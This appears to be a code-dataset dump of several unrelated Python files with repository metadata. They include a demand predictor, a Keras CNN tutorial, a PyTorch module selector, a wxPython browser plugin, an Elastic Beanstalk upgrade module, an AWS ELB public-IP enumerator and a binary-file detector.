#--------------------------------------
if 'list' in str(type(rank)):
if len(rank)==LEN: tdf['RANK'] = rank
elif len(rank)==2:
r1,r2 = tuple(rank)
tdf['RANK'] = np.linspace(r1,r2,LEN)
else: tdf['RANK'] = rank[0]
else: tdf['RANK'] = rank
#--------------------------------------
md_ratio2 = max(0.3,min(md_ratio,0.99))
other_ratio = (1.0-md_ratio2)/md_ratio2
tdf['BBR'] = bb_ratio
tdf['MDR'] = md_ratio2
#--------------------------------------
M = tdf.values
results = []
for row in M:
d,c,r = tuple(row[:3])
pred_100 = Models2[c].predict(r,d,100.0)
pred_bbr = Models2[c].predict(r,d,100.0*bb_ratio)
results.append([pred_100,pred_bbr])
tdf['P_100'] = [r[0][1] for r in results]
tdf['P_100_HI'] = [r[0][2] for r in results]
tdf['P_100_LO'] = [r[0][0] for r in results]
tdf['P_BBR'] = [r[1][1] for r in results]
tdf['P_BBR_HI'] = [r[1][2] for r in results]
tdf['P_BBR_LO'] = [r[1][0] for r in results]
tdf['P_OTH'] = other_ratio * tdf['P_100']
tdf['P_OTH_HI'] = other_ratio * tdf['P_100_HI']
tdf['P_OTH_LO'] = other_ratio * tdf['P_100_LO']
tdf['P_TOT'] = tdf['P_BBR'] +tdf['P_OTH']
tdf['P_TOT_HI'] = tdf['P_BBR_HI']+tdf['P_OTH_HI']
tdf['P_TOT_LO'] = tdf['P_BBR_LO']+tdf['P_OTH_LO']
cols = list(tdf.columns)[5:]
for col in cols:
col2 = col+'_C'
tdf[col2] = np.cumsum(tdf[col])
Matrix = [list(tdf.columns)]
for row in tdf.values:
Matrix.append(list(row))
MainPred = list(tdf['P_TOT_C'])[-1]
return [MainPred,Matrix]
def SpreePred(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
result = SpreetailPredict(cat,rank,date1,date2,bb_ratio,md_ratio)
M = result[1]
cols,m = M[0],M[1:]
return pd.DataFrame(m,columns=cols)
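# Example call (hypothetical values; assumes the MODELS/<CAT>/DFM2.pkl files above
# loaded successfully and that DemandHelper provides global2local):
#   total, matrix = SpreetailPredict('TOY', rank=[1500, 2500], date1='2018-09-03', date2=30)
#   df = SpreePred('Toys & Games', 2000, date2=14, bb_ratio=0.9)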
#################################################################
#################################################################
# [END]
| 25.463415 | 81 | 0.543423 | 987 | 0.157567 | 0 | 0 | 0 | 0 | 0 | 0 | 2,071 | 0.330619 |
907a8e9bf17e1ccce65533dabf9db7c106ceba56 | 1,088 | py | Python | Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 90f110158cbf0ce02fd4d5d09e3b2034428d9992 | ["MIT"] | 7 | 2019-02-16T02:52:12.000Z | 2021-11-08T13:10:46.000Z | Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 90f110158cbf0ce02fd4d5d09e3b2034428d9992 | ["MIT"] | null | null | null | Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 90f110158cbf0ce02fd4d5d09e3b2034428d9992 | ["MIT"] | 14 | 2018-11-18T04:33:38.000Z | 2021-08-14T03:29:18.000Z |
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Flatten
from keras.layers import Conv2D, MaxPooling2D
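# Note: the listing below assumes x_train/y_train, x_test/y_test and num_classes are
# prepared elsewhere. With input_shape=(128, 128, 1) the data cannot be raw 28x28 MNIST;
# the images are assumed to be 128x128 single-channel arrays and the labels one-hot
# encoded, e.g. num_classes = 10 and y_train = keras.utils.to_categorical(labels, num_classes).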
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=(128, 128, 1)))
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=(128, 128, 1)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(10000, activation='relu'))
model.add(Dense(1000, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd')
model.fit(x_train, y_train,
epochs=100,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test)
| 31.085714 | 51 | 0.669118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 88 | 0.080882 |
907b2f51dc7dc8191cd5bf95004855d172a84d81 | 15,373 | py | Python | k1lib/selector.py | 157239n/k1lib | 285520b8364ad5b21cb736b44471aa939e692e9b | ["MIT"] | 1 | 2021-08-11T19:10:08.000Z | 2021-08-11T19:10:08.000Z | k1lib/selector.py | 157239n/k1lib | 285520b8364ad5b21cb736b44471aa939e692e9b | ["MIT"] | null | null | null | k1lib/selector.py | 157239n/k1lib | 285520b8364ad5b21cb736b44471aa939e692e9b | ["MIT"] | null | null | null |
# AUTOGENERATED FILE! PLEASE DON'T EDIT
"""
This module is for selecting a subnetwork using CSS so that you can do special
things to them. Checkout the tutorial section for a walkthrough. This is exposed
automatically with::
from k1lib.imports import *
selector.select # exposed
"""
from torch import nn; import k1lib, re, torch
from typing import List, Tuple, Dict, Union, Any, Iterator, Callable
from contextlib import contextmanager; from functools import partial
__all__ = ["ModuleSelector", "preprocess", "select"]
def preprocess(selectors:str, defaultProp="*") -> List[str]:
r"""Removes all quirkly features allowed by the css
language, and outputs nice lines. Example::
# returns ["a:f", "a:g,h", "b:g,h", "t:*"]
selector.preprocess("a:f; a, b: g,h; t")
:param selectors: single css selector string. Statements separated
by "\\n" or ";"
:param defaultProp: default property, if statement doesn't have one"""
# filtering unwanted characters and quirky spaces
lines = [e for l in selectors.split("\n") for e in l.split(";")]
selectors = [re.sub("(^\s+)|(\s+$)", "", re.sub("\s\s+", " ", line)).replace(" >", ">").replace("> ", ">").replace(" :", ":").replace(": ", ":").replace(" ,", ",").replace(", ", ",").replace(";", "\n").replace(" \n", "\n").replace("\n ", "\n") for line in lines if line != ""]
# adding "*" to all selectors with no props specified
selectors = [selector if ":" in selector else f"{selector}:{defaultProp}" for selector in selectors]
# expanding comma-delimited selectors
return [f"{segment}:{selector.split(':')[1]}" for selector in selectors for segment in selector.split(":")[0].split(",")]
def _getParts(s:str): return [a for elem in s.split(":")[0].split(">") if elem for a in elem.split(" ") if a]
def _getProps(s:str): return [elem for elem in s.split(":")[1].split(",") if elem]
_idxAuto = k1lib.AutoIncrement()
class ModuleSelector: # empty methods so that Sphinx generates the docs in order
props:List[str]
"""Properties of this :class:`ModuleSelector`"""
idx:int
"""Unique id of this :class:`ModuleSelector` in the entire script. May be useful
for module recognition"""
nn:"torch.nn.Module"
"""The associated :class:`torch.nn.Module` of this :class:`ModuleSelector`"""
def __init__(self, parent:"ModuleSelector", name:str, nn:"torch.nn.Module"):
self.parent = parent; self.name = name; self.nn = nn
self._children:Dict["ModuleSelector"] = {}
self.props:List[str] = []; self.depth:int = 0
self.directSelectors:List[str] = []
self.indirectSelectors:List[str] = []
self.displayF:Callable[["ModuleSelector"], str] = lambda mS: ', '.join(mS.props)
self.idx = _idxAuto()
def deepestDepth(self): pass
def highlight(self, prop:str):
"""Highlights the specified prop when displaying the object."""
self.displayF = lambda self: (k1lib.fmt.txt.red if prop in self else k1lib.fmt.txt.identity)(', '.join(self.props))
return self
def __call__(self, *args, **kwargs):
"""Calls the internal :class:`torch.nn.Module`"""
return self.nn(*args, **kwargs)
def __contains__(self): pass
def named_children(self): pass
def children(self): pass
def named_modules(self): pass
def modules(self): pass
def directParams(self): pass
def parse(self): pass
def apply(self): pass
def clearProps(self): pass
@property
def displayF(self):
"""Function to display each ModuleSelector's lines.
Default is just::
lambda mS: ", ".join(mS.props) """
return self._displayF
@displayF.setter
def displayF(self, f):
def applyF(self): self._displayF = f
self.apply(applyF)
def __getattr__(self, attr):
if attr.startswith("_"): raise AttributeError(attr)
if attr in self._children: return self._children[attr]
return self.directParams[attr]
def __getitem__(self, idx): return getattr(self, str(idx))
@staticmethod
def sample() -> "ModuleSelector":
"""Create a new example :class:`ModuleSelector` that has a bit of
hierarchy to them, with no css."""
return nn.Sequential(nn.Linear(3, 4), nn.Sequential(nn.Conv2d(3, 8, 3, 2), nn.ReLU(), nn.Linear(5, 6)), nn.Linear(7, 8)).select("")
def hookF(self): pass
def hookFp(self): pass
def hookB(self): pass
def freeze(self): pass
def unfreeze(self): pass
@k1lib.patch(nn.Module)
def select(model:"torch.nn.Module", css:str="*") -> "k1lib.selector.ModuleSelector":
"""Creates a new ModuleSelector, in sync with a model.
Example::
mS = selector.select(nn.Linear(3, 4), "#root:propA")
Or, you can do it the more direct way::
mS = nn.Linear(3, 4).select("#root:propA")
:param model: the :class:`torch.nn.Module` object to select from
:param css: the css selectors"""
root = ModuleSelector(None, "root", model)
root.parse(preprocess(css)); return root
@k1lib.patch(ModuleSelector, name="apply")
def _apply(self, f:Callable[[ModuleSelector], None]):
"""Applies a function to self and all child :class:`ModuleSelector`"""
f(self)
for child in self._children.values(): child.apply(f)
@k1lib.patch(ModuleSelector, name="parse")
def _parse(self, selectors:Union[List[str], str]) -> ModuleSelector:
"""Parses extra selectors. Clears all old selectors, but retain
the props. Returns self. Example::
mS = selector.ModuleSelector.sample().parse("Conv2d:propA")
# returns True
"propA" in mS[1][0]
:param selectors: can be the preprocessed list, or the unprocessed css string"""
if isinstance(selectors, str): selectors = preprocess(selectors)
self.directSelectors = []; self.indirectSelectors = []
ogSelectors = selectors
if self.parent != None:
selectors = [] + selectors + self.parent.indirectSelectors + self.parent.directSelectors
self.indirectSelectors += self.parent.indirectSelectors
self.depth = self.parent.depth + 1
for selector in selectors:
parts = _getParts(selector)
matches = parts[0] == self.nn.__class__.__name__ or parts[0] == "#" + self.name or parts[0] == "*"
if len(parts) == 1:
if matches: self.props += _getProps(selector)
else:
a = selector.find(">"); a = a if a > 0 else float("inf")
b = selector.find(" "); b = b if b > 0 else float("inf")
direct = a < b
if matches:
if direct: self.directSelectors.append(selector[a+1:])
else: self.indirectSelectors.append(selector[b+1:])
for name, mod in self.nn.named_children():
if name not in self._children:
self._children[name] = ModuleSelector(self, name, mod)
self._children[name].parse(ogSelectors)
self.props = list(set(self.props)); return self
@k1lib.patch(ModuleSelector)
def __contains__(self, prop:str=None) -> bool:
"""Whether this :class:`ModuleSelector` has a specific prop.
Example::
# returns True
"b" in nn.Linear(3, 4).select("*:b")
# returns False
"h" in nn.Linear(3, 4).select("*:b")
# returns True, "*" here means the ModuleSelector has any properties at all
"*" in nn.Linear(3, 4).select("*:b")"""
if "*" in self.props: return True
if prop in self.props: return True
if prop == "*" and len(self.props) > 0: return True
return False
@k1lib.patch(ModuleSelector)
def named_children(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
if prop is None: return self._children.items()
return ((k, v) for k, v in self._children.items() if prop in v)
@k1lib.patch(ModuleSelector)
def children(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
return (x for _, x in self.named_children(prop))
@k1lib.patch(ModuleSelector, "directParams")
@property
def directParams(self) -> Dict[str, nn.Parameter]:
"""Dict params directly under this module"""
return {name: param for name, param in self.nn.named_parameters() if "." not in name}
@k1lib.patch(ModuleSelector)
def named_modules(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named child recursively.
Example::
modules = list(nn.Sequential(nn.Linear(3, 4), nn.ReLU()).select().named_modules())
# return 3
len(modules)
# return tuple ('0', <ModuleSelector of Linear>)
modules[1]
:param prop: Filter property. See also: :meth:`__contains__`"""
if prop != None:
yield from ((name, m) for name, m in self.named_modules() if prop in m)
return
yield self.name, self
for child in self._children.values(): yield from child.named_modules()
@k1lib.patch(ModuleSelector)
def modules(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all child recursively.
:param prop: Filter property. See also: :meth:`__contains__`"""
for name, x in self.named_modules(prop): yield x
@k1lib.patch(ModuleSelector)
def clearProps(self) -> "ModuleSelector":
"""Clears all existing props of this and all descendants
:class:`ModuleSelector`. Example::
# returns False
"b" in nn.Linear(3, 4).select("*:b").clearProps()"""
def applyF(self): self.props = []
self.apply(applyF); return self
@k1lib.patch(ModuleSelector, name="deepestDepth")
@property
def deepestDepth(self):
"""Deepest depth of the tree. If self doesn't
have any child, then depth is 0"""
if len(self._children) == 0: return 0
return 1 + max([child.deepestDepth for child in self._children.values()])
@k1lib.patch(ModuleSelector)
def __repr__(self, intro:bool=True, header:Union[str, Tuple[str]]="", footer="", tabs:int=None):
"""
:param intro: whether to include a nice header and footer info
:param header:
str: include a header that starts where `displayF` will start
Tuple[str, str]: first one in tree, second one in displayF section
:param footer: same thing with header, but at the end
:param tabs: number of tabs at the beginning. Best to leave this empty
"""
if tabs == None: tabs = 5 + self.deepestDepth
answer = "ModuleSelector:\n" if intro else ""
if header:
h1, h2 = ("", header) if isinstance(header, str) else header
answer += h1.ljust(tabs*4, " ") + h2 + "\n"
answer += f"{self.name}: {self.nn.__class__.__name__}".ljust(tabs*4, " ")
answer += self.displayF(self) + ("\n" if len(self._children) > 0 else "")
answer += k1lib.tab("\n".join([child.__repr__(tabs=tabs-1, intro=False) for name, child in self._children.items()]))
if footer:
f1, f2 = ("", footer) if isinstance(footer, str) else footer
answer += "\n" + f1.ljust(tabs*4, " ") + f2
if intro: answer += f"""\n\nCan...
- mS.deepestDepth: get deepest depth possible
- mS.nn: get the underlying nn.Module object
- mS.apply(f): apply to self and all descendants
- "HookModule" in mS: whether this module has a specified prop
- mS.highlight(prop): highlights all modules with specified prop
- mS.parse([..., ...]): parses extra css
- mS.directParams: get Dict[str, nn.Parameter] that are directly under this module"""
return answer
def _strTensor(t): return "None" if t is None else f"{t.shape}"
def strTensorTuple(ts):
if len(ts) > 1:
shapes = "\n".join(f"- {_strTensor(t)}" for t in ts)
return f"tensors ({len(ts)} total) shapes:\n{shapes}"
else:
return f"tensor shape: {_strTensor(ts[0])}"
@k1lib.patch(ModuleSelector)
@contextmanager
def hookF(self, f:Callable[[ModuleSelector, "torch.nn.Module", Tuple[torch.Tensor], torch.Tensor], None]=None, prop:str="*"):
"""Context manager for applying forward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookF(f):
m(torch.randn(2, 3))
:param f: hook callback, should accept :class:`ModuleSelector`, inputs and output
:param prop: filter property of module to hook onto. If not specified, then it will print out input and output tensor shapes."""
    if f is None: f = lambda mS, m, i, o: print(f"Forward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput tensor shape: {o.shape}"))
    g = lambda m, i, o: f(self, m, i, o)
handles = [m.nn.register_forward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookFp(self, f=None, prop:str="*"):
"""Context manager for applying forward pre hooks.
Example::
def f(mS, m, i):
print(i)
m = nn.Linear(3, 4)
with m.select().hookFp(f):
m(torch.randn(2, 3))
:param f: hook callback, should accept :class:`ModuleSelector` and inputs
:param prop: filter property of module to hook onto. If not specified, then it will print out input tensor shapes."""
    if f is None: f = lambda mS, m, i: print(f"Forward pre hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}"))
    g = lambda m, i: f(self, m, i)
handles = [m.nn.register_forward_pre_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookB(self, f=None, prop:str="*"):
"""Context manager for applying backward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookB(f):
m(torch.randn(2, 3)).sum().backward()
:param f: hook callback, should accept :class:`ModuleSelector`, grad inputs and outputs
:param prop: filter property of module to hook onto. If not specified, then it will print out input tensor shapes."""
    if f is None: f = lambda mS, m, i, o: print(f"Backward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput {strTensorTuple(o)}"))
    g = lambda m, i, o: f(self, m, i, o)
handles = [m.nn.register_full_backward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
from contextlib import ExitStack
@contextmanager
def _freeze(self, value:bool, prop:str):
modules = [m for m in self.modules(prop)]
with ExitStack() as stack:
for m in self.modules(prop):
stack.enter_context(m.nn.gradContext())
m.nn.requires_grad_(value)
try: yield
finally: pass
@k1lib.patch(ModuleSelector)
def freeze(self, prop:str="*"):
"""Returns a context manager that freezes (set requires_grad to False) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
l.run(1)
# returns True
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, False, prop)
@k1lib.patch(ModuleSelector)
def unfreeze(self, prop:str="*"):
"""Returns a context manager that unfreezes (set requires_grad to True) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
with l.model.select("#lin1 > #lin").unfreeze():
l.run(1)
# returns False
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, True, prop) | 43.426554 | 280 | 0.656866 | 2,541 | 0.16529 | 3,431 | 0.223184 | 11,183 | 0.727444 | 0 | 0 | 6,935 | 0.451116 |
907cab399c56f59d773c9098dcb9ad23a5c47d44 | 3,482 | py | Python | plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | a513a029fa1ff2059ee262c524b4b2b45111f1a6 | ["MIT"] | 11 | 2021-12-20T15:32:17.000Z | 2022-03-16T03:54:02.000Z | plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | a513a029fa1ff2059ee262c524b4b2b45111f1a6 | ["MIT"] | 156 | 2021-12-31T21:01:31.000Z | 2022-03-20T21:57:31.000Z | plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | a513a029fa1ff2059ee262c524b4b2b45111f1a6 | ["MIT"] | 3 | 2022-01-21T14:52:43.000Z | 2022-02-12T05:32:19.000Z |
'''
Created on 22 Feb. 2022
@author: slinux
'''
from .wxRavenGeneralDesign import wxRavenWebBrowser
from wxRavenGUI.application.wxcustom.CustomLoading import *
from wxRavenGUI.application.wxcustom import *
import wx.html2 as webview
import sys
import logging
from wxRavenGUI.application.wxcustom.CustomUserIO import UserAdvancedMessage
class wxRaven_WebBrowserLogic(wxRavenWebBrowser):
'''
classdocs
'''
#
# Datas for the plugin display style
#
#
view_base_name = "WebBrowser"
view_name = "WebBrowser"
parent_frame = None
default_position = "main"
icon = 'internal_browser'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "WebBrowser", isInternalPluginView=False, url=''):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#
# Your constructor here
#
self.view_base_name = "WebBrowser"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._loadingPanel = None
parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
#This is to add the view in the appropriate place using the mainapp to do so
#
#The only exception is when the pannel itself is called by the plugin or another view
#In this case the position in main app must not be managed (see rpc command panel as example)
#
if not isInternalPluginView:
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#is_windows = hasattr(sys, 'getwindowsversion')
#if is_windows:
# self.WindowsSetup()
self.wv=wxRavenWebview.GetWebView(self.m_webPan)
'''
is_windows = hasattr(sys, 'getwindowsversion')
if is_windows:
webview.WebView.MSWSetEmulationLevel(webview.WEBVIEWIE_EMU_IE11)
_backend = self.GetAvailableBackend(_windows=True)
if _backend == None:
UserAdvancedMessage(parentFrame, "Unable to find a backend for the webview, \n please verify you do have the webview component or download it (url in details)", "Error", "https://developer.microsoft.com/en-us/microsoft-edge/webview2/", showCancel=False)
self.wv = webview.WebView.New(self, backend=_backend)
else:
self.wv= webview.WebView.New(self)
'''
self.bSizer1 = wx.BoxSizer( wx.VERTICAL )
self.bSizer1.Add( self.wv, 1, wx.ALL|wx.EXPAND, 5 )
self.m_webPan.SetSizer( self.bSizer1 )
self.Layout()
self.m_buttonGo.Bind(wx.EVT_BUTTON,self.GetUrl )
if url == '':
pass
#self.LoadRavencoinIPFS()
else:
            self.OpenUrl(url)
def UpdateView(self, evt=None):
pass
def GetUrl(self, evt):
url = self.m_textCtrlURL.GetValue()
self.wv.LoadURL(url)
def OpenUrl(self, url_text, _writeInAddress=True):
if _writeInAddress:
self.m_textCtrlURL.SetValue(url_text)
self.wv.LoadURL(url_text)
| 30.017241 | 269 | 0.601091 | 3,118 | 0.895205 | 0 | 0 | 0 | 0 | 0 | 0 | 1,408 | 0.404249 |
907d53bdf5f863a5b666758a3f35cfee8a3a43e9 | 4,097 | py | Python | backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 9fbdd19f48ed873899093c7d034ed4e0d017c19d | ["MIT"] | 2 | 2017-11-16T15:02:43.000Z | 2017-11-20T17:41:16.000Z | backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 9fbdd19f48ed873899093c7d034ed4e0d017c19d | ["MIT"] | 10 | 2020-01-28T22:12:06.000Z | 2022-03-11T23:16:53.000Z | backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 9fbdd19f48ed873899093c7d034ed4e0d017c19d | ["MIT"] | 2 | 2017-11-16T14:59:03.000Z | 2017-11-16T23:52:13.000Z |
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.objects.platform import PlatformVersion
from ..resources.strings import prompts
from ..resources.statics import namespaces, option_names
from ..core import io
from ..lib import elasticbeanstalk
from . import commonops
def _get_warning_message(confirm, single, rolling_enabled, webserver, noroll):
if confirm:
return None
elif single:
return prompts['upgrade.singleinstance']
elif not rolling_enabled and noroll:
return prompts['upgrade.norollingforce']
elif not rolling_enabled:
if webserver:
type = 'Health'
else:
type = 'Time'
return prompts['upgrade.norollingapply'].format(type)
elif rolling_enabled:
return prompts['upgrade.rollingupdate']
def _should_add_rolling(single, rolling_enabled, noroll):
if noroll:
return False
if single:
return False
if rolling_enabled:
return False
return True
def upgrade_env(app_name, env_name, timeout, confirm, noroll):
env = elasticbeanstalk.get_environment_settings(app_name, env_name)
latest = commonops.get_latest_solution_stack(env.platform.version)
if latest == env.platform:
io.echo(prompts['upgrade.alreadylatest'])
return
else:
single = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ENVIRONMENT,
'EnvironmentType') == 'SingleInstance'
rolling_enabled = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED) == 'true'
webserver = env.tier.name.lower() == 'webserver'
io.echo()
io.echo(prompts['upgrade.infodialog'].format(env_name))
io.echo('Current platform:', env.platform)
io.echo('Latest platform: ', latest)
io.echo()
warning = _get_warning_message(confirm, single,
rolling_enabled, webserver, noroll)
if warning:
io.log_warning(warning)
io.echo(prompts['upgrade.altmessage'])
io.echo()
if not confirm:
# Get confirmation
io.validate_action(prompts['upgrade.validate'], env.name)
add_rolling = _should_add_rolling(single, rolling_enabled, noroll)
do_upgrade(env_name, add_rolling, timeout, latest.name,
health_based=webserver, platform_arn = latest.version)
def do_upgrade(env_name, add_rolling, timeout, solution_stack_name,
health_based=False, platform_arn=None):
if add_rolling:
if health_based:
roll_type = 'Health'
else:
roll_type = 'Time'
changes = [
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED,
'true'),
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_TYPE,
roll_type)
]
io.log_warning(prompts['upgrade.applyrolling'].format(roll_type))
else:
changes = None
if PlatformVersion.is_valid_arn(platform_arn):
commonops.update_environment(
env_name, changes, None, timeout=timeout,
platform_arn=platform_arn)
else:
commonops.update_environment(
env_name, changes, None, timeout=timeout,
solution_stack_name=solution_stack_name) | 35.626087 | 78 | 0.661948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 887 | 0.2165 |
907e1b4a54a9e37e87ee07e0eb6f6b12a199f562 | 2,719 | py | Python | src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 6f750b5c8e6ff151472911bb45c6f11c0a6cd8ff | ["MIT"] | null | null | null | src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 6f750b5c8e6ff151472911bb45c6f11c0a6cd8ff | ["MIT"] | null | null | null | src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 6f750b5c8e6ff151472911bb45c6f11c0a6cd8ff | ["MIT"] | null | null | null |
''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
import logging
import boto3
from perimeterator.helper import aws_elb_arn
from perimeterator.helper import dns_lookup
class Enumerator(object):
''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
# Required for Boto and reporting.
SERVICE = 'elb'
def __init__(self, region):
self.logger = logging.getLogger(__name__)
self.region = region
self.client = boto3.client(self.SERVICE, region_name=region)
def get(self):
''' Attempt to get all Public IPs from ELBs. '''
resources = []
# Iterate over results until AWS no longer returns a 'NextMarker' in
# order to ensure all results are retrieved.
marker = ''
while marker is not None:
# Unfortunately, Marker=None or Marker='' is invalid for this API
# call, so it looks like we can't just set this to a None value,
# or use a ternary here.
if marker:
candidates = self.client.describe_load_balancers(
Marker=marker
)
else:
candidates = self.client.describe_load_balancers()
# Check if we need to continue paging.
if "NextMarker" in candidates:
self.logger.debug(
"'NextMarker' found, additional page of results to fetch"
)
marker = candidates["NextMarker"]
else:
marker = None
# For some odd reason the AWS API doesn't appear to allow a
# filter on describe operations for ELBs, so we'll have to filter
# manually.
for elb in candidates["LoadBalancerDescriptions"]:
self.logger.debug(
"Inspecting ELB %s", elb["LoadBalancerName"],
)
if elb["Scheme"] != "internet-facing":
self.logger.debug("ELB is not internet facing")
continue
# Lookup the DNS name for this ELB to get the current IPs. We
# also need to construct the ARN, as it's not provided in the
# output from a describe operation (?!)
resources.append({
"service": self.SERVICE,
"identifier": aws_elb_arn(
self.region,
elb["LoadBalancerName"]
),
"cname": elb["DNSName"],
"addresses": dns_lookup(elb["DNSName"]),
})
self.logger.info("Got IPs for %s resources", len(resources))
return resources
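# Example usage (assumes AWS credentials for the target account are available to
# boto3, e.g. via environment variables or an instance profile):
#   enumerator = Enumerator("eu-west-1")
#   for resource in enumerator.get():
#       print(resource["identifier"], resource["addresses"])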
| 37.246575 | 77 | 0.543582 | 2,535 | 0.932328 | 0 | 0 | 0 | 0 | 0 | 0 | 1,108 | 0.407503 |
907f3c024ac75afd4ff1f45c65ec5e6e22c38567 | 1,685 | py | Python | binarycheck.py | pnordin/trimeol | 2f58db29df9b28f249c1b9fa851f04119158bbd5 | ["MIT"] | null | null | null | binarycheck.py | pnordin/trimeol | 2f58db29df9b28f249c1b9fa851f04119158bbd5 | ["MIT"] | null | null | null | binarycheck.py | pnordin/trimeol | 2f58db29df9b28f249c1b9fa851f04119158bbd5 | ["MIT"] | null | null | null |
"""Module to help guess whether a file is binary or text.
Requirements:
Python 2.7+
Recommended:
Python 3
"""
def is_binary_file(fname):
"""Attempt to guess if 'fname' is a binary file heuristically.
This algorithm has many flaws. Use with caution.
It assumes that if a part of the file has NUL bytes
or has more control characters than text characters,
it is a binary file.
Additionally, an ASCII compatible character set is assumed.
Returns True if 'fname' appears to be a binary file.
"""
with open(fname, 'rb') as fh:
chunk = fh.read(1024)
if not chunk: # Empty file
return False
if b'\x00' in chunk: # Has NUL bytes
return True
ncontrol = control_char_count(chunk)
ntext = len(chunk) - ncontrol
return ncontrol > ntext
def is_control_char(c):
"""Return True if 'c' is a control character.
c is considered a control character if
it is outside of the extended ASCII set or
has a code below 32 with some exclusions.
An ASCII compatible character set is assumed.
"""
charcode = 0
# The following assignment
# should make this module compatible with
# at least Python 2.7 (tested on 2.7.9).
try:
charcode = ord(c)
except TypeError:
charcode = c
excludes = ("\t", "\r", "\n")
if charcode in [ord(char) for char in excludes]:
return False
return (charcode < 32 or
charcode > 255)
def control_char_count(data):
"""Return the count of control characters in 'data'."""
n = 0
for c in data:
if is_control_char(c):
n += 1
return n
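if __name__ == "__main__":
    # Minimal, illustrative command-line demo: classify each path given as an
    # argument using the heuristic above (kept Python 2.7 compatible).
    import sys
    for name in sys.argv[1:]:
        kind = "binary" if is_binary_file(name) else "text"
        print("{0}: {1}".format(name, kind))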
| 25.923077 | 66 | 0.626113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 955 | 0.566766 |
9080c3b939a2c1af97171c5d7d2b2932cf209fec | 8,329 | py | Python | spiketoolkit/validation/quality_metric_classes/snr.py | seankmartin/spiketoolkit | 38261d95045b1cd689363579c10ab3aa0a1ab7c0 | ["MIT"] | null | null | null | spiketoolkit/validation/quality_metric_classes/snr.py | seankmartin/spiketoolkit | 38261d95045b1cd689363579c10ab3aa0a1ab7c0 | ["MIT"] | null | null | null | spiketoolkit/validation/quality_metric_classes/snr.py | seankmartin/spiketoolkit | 38261d95045b1cd689363579c10ab3aa0a1ab7c0 | ["MIT"] | null | null | null |
import numpy as np
